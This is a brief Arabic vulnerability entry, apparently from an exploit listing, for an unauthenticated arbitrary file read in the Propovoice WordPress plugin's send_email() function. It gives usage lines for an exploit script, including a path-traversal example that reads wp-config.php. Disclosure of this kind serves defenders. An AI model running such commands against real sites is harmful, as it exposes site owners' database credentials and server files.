
Propovoice <= 1.7.6.7 - قراءة ملفات تعسفية بدون مصادقة
Propovoice <= 1.7.6.7 - قراءة ملفات تعسفية بدون مصادقة
إضافة Propovoice: نظام إدارة العملاء الشامل الخاصة بووردبريس معرضة لثغرة قراءة الملفات التعسفية في جميع الإصدارات حتى 1.7.6.7 ضمنًا عبر دالة send_email(). وهذا يتيح للمهاجمين غير المصادق عليهم قراءة محتويات ملفات تعسفية على الخادم، والتي قد تحتوي على معلومات حساسة.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php